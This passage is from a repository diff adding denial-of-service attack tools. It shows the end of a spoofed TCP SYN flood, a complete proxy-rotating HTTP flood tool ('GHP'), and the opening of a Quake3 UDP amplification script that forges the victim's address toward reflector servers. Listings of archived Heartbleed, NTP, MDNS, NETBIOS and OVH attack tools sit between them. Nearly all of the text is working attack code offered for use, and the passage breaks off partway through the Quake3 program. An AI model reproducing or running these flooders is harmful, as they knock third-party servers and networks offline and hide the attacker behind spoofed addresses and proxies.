int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
unsigned short *tcp = malloc(totaltcp_len);
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
unsigned short output = csum(tcp,totaltcp_len);
free(tcp);
return output;
}
void setup_ip_header(struct iphdr *iph)
{
iph->ihl = 5;
iph->version = 4;
iph->tos = 0;
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
iph->id = htonl(54321);
iph->frag_off = 0;
iph->ttl = MAXTTL;
iph->protocol = 6;
iph->check = 0;
iph->saddr = inet_addr("192.168.3.100");
}
void setup_tcp_header(struct tcphdr *tcph)
{
tcph->source = htons(5678);
tcph->seq = rand();
tcph->ack_seq = 1;
tcph->res2 = 1;
tcph->doff = 5;
tcph->syn = 1;
tcph->window = htons(65535);
tcph->check = 1;
tcph->urg_ptr = 1;
}
void *flood(void *par1)
{
char *td = (char *)par1;
char datagram[MAX_PACKET_SIZE];
struct iphdr *iph = (struct iphdr *)datagram;
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
struct sockaddr_in sin;
sin.sin_family = AF_INET;
sin.sin_port = htons(floodport);
sin.sin_addr.s_addr = inet_addr(td);
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
if(s < 0){
fprintf(stderr, "Could not open raw socket.\n");
exit(-1);
}
memset(datagram, 0, MAX_PACKET_SIZE);
setup_ip_header(iph);
setup_tcp_header(tcph);
tcph->dest = htons(floodport);
iph->daddr = sin.sin_addr.s_addr;
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
int tmp = 1;
const int *val = &tmp;
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
exit(-1);
}
init_rand(time(NULL));
register unsigned int i;
i = 0;
while(1){
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
tcph->seq = rand_cmwc() & 0xFFFF;
tcph->source = htons(rand_cmwc() & 0xFFFF);
tcph->check = 0;
tcph->check = tcpcsum(iph, tcph);
pps++;
if(i >= limiter)
{
i = 0;
usleep(sleeptime);
}
i++;
}
}
int main(int argc, char *argv[ ])
{
if(argc < 6){
fprintf(stderr, "Invalid parameters!\n");
fprintf(stdout, "Usage: %s <target IP> <port to be flooded> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
exit(-1);
}
fprintf(stdout, "Setting up Sockets...\n");
int num_threads = atoi(argv[3]);
floodport = atoi(argv[2]);
int maxpps = atoi(argv[4]);
limiter = 0;
pps = 0;
pthread_t thread[num_threads];
int multiplier = 20;
int i;
for(i = 0;i<num_threads;i++){
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
}
fprintf(stdout, "Starting Flood...\n");
for(i = 0;i<(atoi(argv[5])*multiplier);i++)
{
usleep((1000/multiplier)*1000);
if((pps*multiplier) > maxpps)
{
if(1 > limiter)
{
sleeptime+=100;
} else {
limiter--;
}
} else {
limiter++;
if(sleeptime > 25)
{
sleeptime-=25;
} else {
sleeptime = 0;
}
}
pps = 0;
}
return 0;
}

598
libs/VirTool.DDoS.GHP.c Normal file
View File

@ -0,0 +1,598 @@
#include <pthread.h>
#include <sys/resource.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <netdb.h>
#include <netinet/in.h>
#include <ctype.h>
#define RND_CHAR (char)((rand() % 26)+97)
char *useragents[] = {
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0 RestSharp 102.0.0.0",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
"Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
"Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1",
"Opera/9.80 (Windows NT 5.1; U; cs) Presto/2.2.15 Version/10.00",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; )",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_5; en-us) AppleWebKit/525.26.2 (KHTML, like Gecko) Version/3.2 Safari/525.26.12",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
"Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.9.0.5) Gecko/2009021916 Songbird/1.1.2 (20090331142126)",
"Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3",
"Mozilla/5.0 (X11; U; Linux; cs-CZ) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) rekonq",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows XP 5.1) Lobo/0.98.4",
"X-Smiles/1.2-20081113",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008120120 Blackbird/0.9991",
"Mozilla/5.0 (SCH-F859/F859DG12;U;NUCLEUS/2.1;Profile/MIDP-2.1 Configuration/CLDC-1.1;480*800;CTC/2.0) Dolfin/2.0",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.10) Gecko/20100914 Conkeror/0.9.3",
"LeechCraft (X11; U; Linux; ru_RU) (LeechCraft/Poshuku 0.3.55-324-g9365f23; WebKit 4.5.2/4.5.2)",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.8) Gecko/20100317 Postbox/1.1.3",
"xine/1.1.16.3",
"Bunjalloo/0.7.6(Nintendo DS;U;en)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; SkipStone 0.8.3) Gecko/20020615 Debian/1.0.0-3 ",
"Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60",
"MMozilla/5.0 (Windows; U; Windows NT 6.1; cs-CZ) AppleWebKit/533.3 (KHTML, like Gecko) QupZilla/1.1.5 Safari/533.3",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 3.5.30729)",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
"Mozilla/5.0 (Windows NT 6.1; rv:2.0b7pre) Gecko/20100921 Firefox/4.0b7pre",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
"Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 5.8 (build 4157); .NET CLR 2.0.50727; AskTbPTV/5.11.3.15590)",
"Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.5 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.4",
"Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1",
"Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1",
};
#define ATTACKPORT 80
char *postformat = "%s /%s HTTP/1.1\r\nHost: %s\r\nUser-Agent: #useragent#\r\nConnection: close\r\nAccept-Encoding: gzip, deflate\r\n%s\r\n%s";
char *postpayload;
struct urlparts {
char * name;
char separator[4];
char value[128];
} parts[] = {
{ "scheme", ":" },
{ "userid", "@" },
{ "password", ":" },
{ "host", "//" },
{ "port", ":" },
{ "path", "/" },
{ "param", ";" },
/*{ "query", "?" },*/
{ "fragment", "#" }
};
enum partnames { scheme = 0, userid, password, host, port, path, param, query, fragment } ;
#define NUMPARTS (sizeof parts / sizeof (struct urlparts))
struct urlparts *returnparts[8];
struct urllist { char *url; int done; struct urllist *next; struct urllist *prev; };
struct proxy { char *type; char *ip; int port; int working; };
struct list { struct proxy *data; char *useragent; struct list *next; struct list *prev; };
struct list *head = NULL;
char parseError[128];
int parseURL(char *url, struct urlparts **returnpart);
char * strsplit(char * s, char * tok);
char firstpunc(char *s);
int strleft(char * s, int n);
void setupparts();
void freeparts();
char *stristr(const char *String, const char *Pattern);
char *str_replace(char *orig, char *rep, char *with);
char *geturl(char *url, char *useragent, char *ip);
char *ipstr;
static int rps = 0;
void *flood(void *par) {
struct list *startpoint = (struct list *)par;
int i;
struct sockaddr_in serverAddr;
signal(SIGPIPE, SIG_IGN);
while(1)
{
int sent = 0;
if(startpoint->data->working == 0)
{
startpoint = startpoint->next;
sleep(1);
continue;
}
memset(&serverAddr, 0, sizeof(serverAddr));
serverAddr.sin_family = AF_INET;
serverAddr.sin_port = htons(startpoint->data->port);
serverAddr.sin_addr.s_addr = inet_addr(startpoint->data->ip);
int serverSocket = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
u_int yes=1;
if (setsockopt(serverSocket,SOL_SOCKET,SO_REUSEADDR,&yes,sizeof(yes)) < 0) {}
if(connect(serverSocket, (struct sockaddr *)&serverAddr, sizeof(serverAddr)) > 0)
{
startpoint->data->working = 0;
startpoint = startpoint->next;
continue;
}
if(strcmp(startpoint->data->type, "Socks4")==0)
{
unsigned char buf[10];
buf[0] = 0x04;
buf[1] = 0x01;
*(unsigned short*)&buf[2] = htons(ATTACKPORT);
*(unsigned long*)&buf[4] = inet_addr(ipstr);
buf[8] = 0x00;
if(send(serverSocket, buf, 9, MSG_NOSIGNAL) != 9)
{
startpoint->data->working = 0;
startpoint = startpoint->next;
close(serverSocket);
continue;
}
}
if(strcmp(startpoint->data->type, "Socks5")==0)
{
unsigned char buf[20];
buf[0] = 0x05;
buf[1] = 0x01;
buf[2] = 0x00;
if((sent = send(serverSocket, buf, 3, MSG_NOSIGNAL)) < 0)
{
startpoint->data->working = 0;
startpoint = startpoint->next;
close(serverSocket);
continue;
}
buf[0] = 0x05;
buf[1] = 0x01;
buf[2] = 0x00;
buf[3] = 0x01;
*(unsigned long*)&buf[4] = inet_addr(ipstr);
*(unsigned short*)&buf[8] = htons(ATTACKPORT);
if((sent = send(serverSocket, buf, 10, MSG_NOSIGNAL)) < 0)
{
startpoint->data->working = 0;
startpoint = startpoint->next;
close(serverSocket);
continue;
}
}
if(strcmp(startpoint->data->type, "CONNECT") == 0 || strcmp(startpoint->data->type, "TUNNEL") == 0)
{
char *connectrequest = malloc(1024);
bzero(connectrequest, 1024);
sprintf(connectrequest, "CONNECT %s:25565 HTTP/1.0\r\n\r\n", ipstr);
if((sent = send(serverSocket, connectrequest, strlen(connectrequest), MSG_NOSIGNAL)) < 0)
{
startpoint->data->working = 0;
startpoint = startpoint->next;
close(serverSocket);
continue;
}
char *recvbuf = malloc(1024);
bzero(recvbuf, 1024);
int gotbytes = recv(serverSocket, recvbuf, 1024, 0);
if(gotbytes < 1)
{
startpoint->data->working = 0;
startpoint = startpoint->next;
close(serverSocket);
continue;
}
free(recvbuf);
}
char *httppayload = str_replace(postpayload, "#useragent#", startpoint->useragent);
if(httppayload == NULL)
{
startpoint = startpoint->next;
close(serverSocket);
continue;
}
char *tmp = NULL;
while((tmp = strstr(httppayload, "%RANDOM%"))!=NULL)
{
*(tmp) = RND_CHAR;
*(tmp+1) = RND_CHAR;
*(tmp+2) = RND_CHAR;
*(tmp+3) = RND_CHAR;
*(tmp+4) = RND_CHAR;
*(tmp+5) = RND_CHAR;
*(tmp+6) = RND_CHAR;
*(tmp+7) = RND_CHAR;
}
send(serverSocket, httppayload, strlen(httppayload), MSG_NOSIGNAL);
free(httppayload);
close(serverSocket);
rps++;
usleep(50000);
//startpoint = startpoint->next;
}
}
int main(int argc, char *argv[ ]) {
if(argc < 6){
fprintf(stderr, "Invalid parameters!\n");
fprintf(stdout, "Usage: %s <target url> <method (GET or HEAD or POST)> <number threads to use> <proxy list> <time> [manual ip (0 to disable)] [post parameters (%RANDOM% will be replaced with random shit)]\n", argv[0]);
exit(-1);
}
//fprintf(stdout, "Setting up Sockets...\n");
int num_threads = atoi(argv[3]);
char *method = argv[2];
if(!(strcmp(method, "GET")==0 || strcmp(method, "HEAD")==0|| strcmp(method, "POST")==0))
{
fprintf(stderr, "Invalid parameters!\n");
fprintf(stdout, "Usage: %s <target url> <method (GET or HEAD or POST)> <number threads to use> <proxy list> <time> [manual ip (0 to disable)] [post parameters (%RANDOM% will be replaced with random shit)]\n", argv[0]);
exit(-1);
}
FILE *pFile = fopen(argv[4], "rb");
if(pFile==NULL)
{
perror("fopen"); exit(1);
}
fseek(pFile, 0, SEEK_END);
long lSize = ftell(pFile);
rewind(pFile);
char *buffer = (char *)malloc(lSize*sizeof(char));
fread(buffer, 1, lSize, pFile);
fclose (pFile);
int i=0;
char *pch = (char *)strtok(buffer, ":");
while(pch != NULL)
{
if(head == NULL)
{
head = (struct list *)malloc(sizeof(struct list));
bzero(head, sizeof(struct list));
head->data = (struct proxy *)malloc(sizeof(struct proxy));
bzero(head->data, sizeof(struct proxy));
head->data->working = 1;
head->data->ip = malloc(strlen(pch)+1); strcpy(head->data->ip, pch);
pch = (char *)strtok(NULL, ":");
if(pch == NULL) exit(-1);
head->data->port = atoi(pch);
pch = (char *)strtok(NULL, ":");
head->data->type = malloc(strlen(pch)+1); strcpy(head->data->type, pch);
pch = (char *)strtok(NULL, ":");
head->useragent = useragents[rand() % (sizeof(useragents)/sizeof(char *))];
head->next = head;
head->prev = head;
} else {
struct list *new_node = (struct list *)malloc(sizeof(struct list));
bzero(new_node, sizeof(struct list));
new_node->data = (struct proxy *)malloc(sizeof(struct proxy));
bzero(new_node->data, sizeof(struct proxy));
new_node->data->working = 1;
new_node->data->ip = malloc(strlen(pch)+1); strcpy(new_node->data->ip, pch);
pch = (char *)strtok(NULL, ":");
if(pch == NULL) break;
new_node->data->port = atoi(pch);
pch = (char *)strtok(NULL, ":");
new_node->data->type = malloc(strlen(pch)+1); strcpy(new_node->data->type, pch);
pch = (char *)strtok(NULL, ":");
new_node->useragent = useragents[rand() % (sizeof(useragents)/sizeof(char *))];
new_node->prev = head;
new_node->next = head->next;
head->next = new_node;
}
}
free(buffer);
const rlim_t kOpenFD = 1024 + (num_threads * 2);
struct rlimit rl;
int result;
rl.rlim_cur = kOpenFD;
rl.rlim_max = kOpenFD;
result = setrlimit(RLIMIT_NOFILE, &rl);
if (result != 0)
{
perror("setrlimit");
fprintf(stderr, "setrlimit returned result = %d\n", result);
}
bzero(&rl, sizeof(struct rlimit));
rl.rlim_cur = 256 * 1024;
rl.rlim_max = 4096 * 1024;
result = setrlimit(RLIMIT_STACK, &rl);
if (result != 0)
{
perror("setrlimit_stack");
fprintf(stderr, "setrlimit_stack returned result = %d\n", result);
}
setupparts();
parseURL(argv[1], returnparts);
if(argc > 6 && !(strcmp(argv[6], "0") == 0))
{
ipstr = malloc(strlen(argv[6])+1);
bzero(ipstr, strlen(argv[6])+1);
strcpy(ipstr, argv[6]);
//fprintf(stdout, "Using manual IP...\n");
} else {
struct hostent *he;
struct in_addr a;
he = gethostbyname(returnparts[host]->value);
if (he)
{
while (*he->h_addr_list)
{
bcopy(*he->h_addr_list++, (char *) &a, sizeof(a));
ipstr = malloc(INET_ADDRSTRLEN+1);
inet_ntop (AF_INET, &a, ipstr, INET_ADDRSTRLEN);
break;
}
}
else
{ herror("gethostbyname"); }
}
char *postdata = malloc(1);
bzero(postdata, 1);
char *extrahead = malloc(1);
bzero(extrahead, 1);
if(argc > 7)
{
//fprintf(stdout, "Using post parameters\n");
postdata = argv[7];
extrahead = malloc(4096);
bzero(extrahead, 4096);
sprintf(extrahead, "Content-Length: %d\r\nContent-Type: application/x-www-form-urlencoded\r\n", strlen(postdata));
}
pthread_t thread[num_threads];
postpayload = malloc(4096);
sprintf(postpayload, postformat, method, returnparts[path]->value, returnparts[host]->value, extrahead, postdata);
freeparts();
//fprintf(stdout, "Starting Flood...\n");
for(i = 0;i<num_threads;i++){
pthread_create(&thread[i], NULL, &flood, (void *)head);
pthread_detach(thread[i]);
head = head->next;
head = head->next;
head = head->next;
head = head->next;
head = head->next;
}
int temp = atoi(argv[5]);
for(i = 0;i<temp;i++)
{
sleep(1);
//printf("R/s: %d\n", rps);
//rps = 0;
}
return 0;
}
void freeparts()
{
return;
if(returnparts[0]!=NULL) { free(returnparts[0]); }
if(returnparts[1]!=NULL) { free(returnparts[1]); }
if(returnparts[2]!=NULL) { free(returnparts[2]); }
if(returnparts[3]!=NULL) { free(returnparts[3]); }
if(returnparts[4]!=NULL) { free(returnparts[4]); }
if(returnparts[5]!=NULL) { free(returnparts[5]); }
if(returnparts[6]!=NULL) { free(returnparts[6]); }
if(returnparts[7]!=NULL) { free(returnparts[7]); }
/*if(returnparts[8]!=NULL) { free(returnparts[8]); }*/
return;
}
void setupparts()
{
returnparts[0] = malloc(sizeof(struct urlparts));
returnparts[1] = malloc(sizeof(struct urlparts));
returnparts[2] = malloc(sizeof(struct urlparts));
returnparts[3] = malloc(sizeof(struct urlparts));
returnparts[4] = malloc(sizeof(struct urlparts));
returnparts[5] = malloc(sizeof(struct urlparts));
returnparts[6] = malloc(sizeof(struct urlparts));
returnparts[7] = malloc(sizeof(struct urlparts));
/*returnparts[8] = malloc(sizeof(struct urlparts));*/
bzero(returnparts[0], sizeof(struct urlparts));
bzero(returnparts[1], sizeof(struct urlparts));
bzero(returnparts[2], sizeof(struct urlparts));
bzero(returnparts[3], sizeof(struct urlparts));
bzero(returnparts[4], sizeof(struct urlparts));
bzero(returnparts[5], sizeof(struct urlparts));
bzero(returnparts[6], sizeof(struct urlparts));
bzero(returnparts[7], sizeof(struct urlparts));
/*bzero(returnparts[8], sizeof(struct urlparts));*/
returnparts[0]->name = "scheme";
strcpy(returnparts[0]->separator, ":");
returnparts[1]->name = "userid";
strcpy(returnparts[1]->separator, "@");
returnparts[2]->name = "password";
strcpy(returnparts[2]->separator, ":");
returnparts[3]->name = "host";
strcpy(returnparts[3]->separator, "//");
returnparts[4]->name = "port";
strcpy(returnparts[4]->separator, ":");
returnparts[5]->name = "path";
strcpy(returnparts[5]->separator, "/");
returnparts[6]->name = "param";
strcpy(returnparts[6]->separator, ";");
/*returnparts[7]->name = "query";
strcpy(returnparts[7]->separator, "?");*/
returnparts[7]->name = "fragment";
strcpy(returnparts[7]->separator, "#");
return;
}
int parseURL(char *url, struct urlparts **returnpart) {
register i;
int seplen;
char * remainder;
//char * regall = ":/;?#";
char * regall = ":/;#";
//char * regpath = ":;?#";
char * regpath = ":;#";
char * regx;
if(!*url)
{
strcpy(parseError, "nothing to do!\n");
return 0;
}
if((remainder = malloc(strlen(url) + 1)) == NULL)
{
printf("cannot allocate memory\n");
exit(-1);
}
strcpy(remainder, url);
if(firstpunc(remainder) == ':')
{
strcpy(returnpart[scheme]->value, strsplit(remainder, returnpart[scheme]->separator));
strleft(remainder, 1);
}
if (!strcmp(returnpart[scheme]->value, "mailto"))
*(returnpart[host]->separator) = 0;
for(i = 0; i < NUMPARTS; i++)
{
if(!*remainder)
break;
if(i == scheme || i == userid || i == password)
continue;
if(i == host && strchr(remainder, '@'))
{
if(!strncmp(remainder, "//", 2))
strleft(remainder, 2);
strcpy(returnpart[userid]->value, strsplit(remainder, ":@"));
strleft(remainder, 1);
if(strchr(remainder, '@'))
{
strcpy(returnpart[password]->value, strsplit(remainder, "@"));
strleft(remainder, 1);
}
*(returnpart[host]->separator) = 0;
}
if(i == path && (! *(returnpart[scheme]->value)))
{
*(returnpart[path]->separator) = 0;
strcpy(returnpart[scheme]->value, "http");
}
regx = (i == path) ? regpath : regall ;
seplen = strlen(returnpart[i]->separator);
if(strncmp(remainder, returnpart[i]->separator, seplen))
continue;
else
strleft(remainder, seplen);
strcpy(returnpart[i]->value, strsplit(remainder, regx));
}
if(*remainder)
sprintf(parseError, "I don't understand '%s'", remainder);
free(remainder);
return 0;
}
char *str_replace(char *orig, char *rep, char *with) {
char *result;
char *ins;
char *tmp;
int len_rep;
int len_with;
int len_front;
int count;
if (!orig)
return NULL;
if (!rep || !(len_rep = strlen(rep)))
return NULL;
if (!(ins = strstr(orig, rep)))
return NULL;
if (!with)
with = "";
len_with = strlen(with);
for (count = 0; tmp = strstr(ins, rep); ++count) {
ins = tmp + len_rep;
}
tmp = result = malloc(strlen(orig) + (len_with - len_rep) * count + 1);
if (!result)
return NULL;
while (count--) {
ins = strstr(orig, rep);
len_front = ins - orig;
tmp = strncpy(tmp, orig, len_front) + len_front;
tmp = strcpy(tmp, with) + len_with;
orig += len_front + len_rep;
}
strcpy(tmp, orig);
return result;
}
char *stristr(const char *String, const char *Pattern)
{
char *pptr, *sptr, *start;
uint slen, plen;
for (start = (char *)String,
pptr = (char *)Pattern,
slen = strlen(String),
plen = strlen(Pattern);
slen >= plen;
start++, slen--)
{
while (toupper(*start) != toupper(*Pattern))
{
start++;
slen--;
if (slen < plen)
return(NULL);
}
sptr = start;
pptr = (char *)Pattern;
while (toupper(*sptr) == toupper(*pptr))
{
sptr++;
pptr++;
if ('\0' == *pptr)
return (start);
}
}
return(NULL);
}
char * strsplit(char * s, char * tok) {
#define OUTLEN (255)
register i, j;
static char out[OUTLEN + 1];
for(i = 0; s[i] && i < OUTLEN; i++)
{
if(strchr(tok, s[i]))
break;
else
out[i] = s[i];
}
out[i] = 0;
if(i && s[i])
{
for(j = 0; s[i]; i++, j++) s[j] = s[i];
s[j] = 0;
}
else if (!s[i])
*s = 0;
return out;
}
char firstpunc(char * s) {
while(*s++)
if(!isalnum(*s)) return *s;
return 0;
}
int strleft(char * s, int n) {
int l;
l = strlen(s);
if(l < n)
return -1;
else if (l == n)
*s = 0;
memmove(s, s + n, l - n + 1);
return n;
}

BIN
libs/VirTool.DDoS.Heartbleed.7z Normal file
View File

Binary file not shown.

BIN
libs/VirTool.DDoS.MDNS.7z Normal file
View File

Binary file not shown.

BIN
libs/VirTool.DDoS.NETBIOS.7z Normal file
View File

Binary file not shown.

BIN
libs/VirTool.DDoS.NTP.7z Normal file
View File

Binary file not shown.

BIN
libs/VirTool.DDoS.OVH.7z Normal file
View File

Binary file not shown.

210
libs/VirTool.DDoS.QUAKE3.c Normal file
View File

@ -0,0 +1,210 @@
/* quake3 amplification script */
#include <time.h>
#include <pthread.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#define MAX_PACKET_SIZE 8192
#define PHI 0x9e3779b9
static uint32_t Q[4096], c = 362436;
struct list
{
struct sockaddr_in data;
struct list *next;
struct list *prev;
};
struct list *head;
volatile int tehport;
volatile int limiter;
volatile unsigned int pps;
volatile unsigned int sleeptime = 100;
struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };
void init_rand(uint32_t x)
{
int i;
Q[0] = x;
Q[1] = x + PHI;
Q[2] = x + PHI + PHI;
for (i = 3; i < 4096; i++)
{
Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
}
}
uint32_t rand_cmwc(void)
{
uint64_t t, a = 18782LL;
static uint32_t i = 4095;
uint32_t x, r = 0xfffffffe;
i = (i + 1) & 4095;
t = a * Q[i] + c;
c = (t >> 32);
x = t + c;
if (x < c) {
x++;
c++;
}
return (Q[i] = r - x);
}
unsigned short csum (unsigned short *buf, int nwords)
{
unsigned long sum = 0;
for (sum = 0; nwords > 0; nwords--)
sum += *buf++;
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
return (unsigned short)(~sum);
}
void setup_ip_header(struct iphdr *iph)
{
iph->ihl = 5;
iph->version = 4;
iph->tos = 0;
iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 14;
iph->id = htonl(54321);
iph->frag_off = 0;
iph->ttl = MAXTTL;
iph->protocol = IPPROTO_UDP;
iph->check = 0;
iph->saddr = inet_addr("192.168.3.100");
}
void setup_udp_header(struct udphdr *udph)
{
udph->source = htons(5678);
udph->dest = htons(27960);
udph->check = 0;
memcpy((void *)udph + sizeof(struct udphdr), "\xff\xff\xff\xff\x67\x65\x74\x73\x74\x61\x74\x75\x73\x0a", 14);
udph->len=htons(sizeof(struct udphdr) + 14);
}
void *flood(void *par1)
{
struct thread_data *td = (struct thread_data *)par1;
char datagram[MAX_PACKET_SIZE];
struct iphdr *iph = (struct iphdr *)datagram;
struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
struct sockaddr_in sin = td->sin;
struct list *list_node = td->list_node;
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
if(s < 0){
fprintf(stderr, "Could not open raw socket.\n");
exit(-1);
}
init_rand(time(NULL));
memset(datagram, 0, MAX_PACKET_SIZE);
setup_ip_header(iph);
setup_udp_header(udph);
udph->source = htons(rand() % 65535 - 1026);
iph->saddr = sin.sin_addr.s_addr;
iph->daddr = list_node->data.sin_addr.s_addr;
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
int tmp = 1;
const int *val = &tmp;
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
exit(-1);
}
init_rand(time(NULL));
register unsigned int i;
i = 0;
while(1){
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
list_node = list_node->next;
iph->daddr = list_node->data.sin_addr.s_addr;
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
pps++;
if(i >= limiter)
{
i = 0;
usleep(sleeptime);
}
i++;
}
}
int main(int argc, char *argv[ ])
{
if(argc < 6){
fprintf(stderr, "Invalid parameters!\n");
fprintf(stdout, "Usage: %s <target IP> <target port> <reflection file> <threads> <pps limiter, -1 for no limit> <time>\n", argv[0]);
exit(-1);
}
srand(time(NULL));
int i = 0;
head = NULL;
fprintf(stdout, "Setting up sockets...\n");
int max_len = 128;
char *buffer = (char *) malloc(max_len);
buffer = memset(buffer, 0x00, max_len);
int num_threads = atoi(argv[4]);
int maxpps = atoi(argv[5]);
limiter = 0;
pps = 0;
int multiplier = 20;
FILE *list_fd = fopen(argv[3], "r");
while (fgets(buffer, max_len, list_fd) != NULL) {
if ((buffer[strlen(buffer) - 1] == '\n') ||
(buffer[strlen(buffer) - 1] == '\r')) {
buffer[strlen(buffer) - 1] = 0x00;
if(head == NULL)
{
head = (struct list *)malloc(sizeof(struct list));
bzero(&head->data, sizeof(head->data));
head->data.sin_addr.s_addr=inet_addr(buffer);
head->next = head;
head->prev = head;
} else {
struct list *new_node = (struct list *)malloc(sizeof(struct list));
memset(new_node, 0x00, sizeof(struct list));
new_node->data.sin_addr.s_addr=inet_addr(buffer);
new_node->prev = head;
new_node->next = head->next;
head->next = new_node;
}
i++;
} else {
continue;
}
}
struct list *current = head->next;
pthread_t thread[num_threads];
struct sockaddr_in sin;
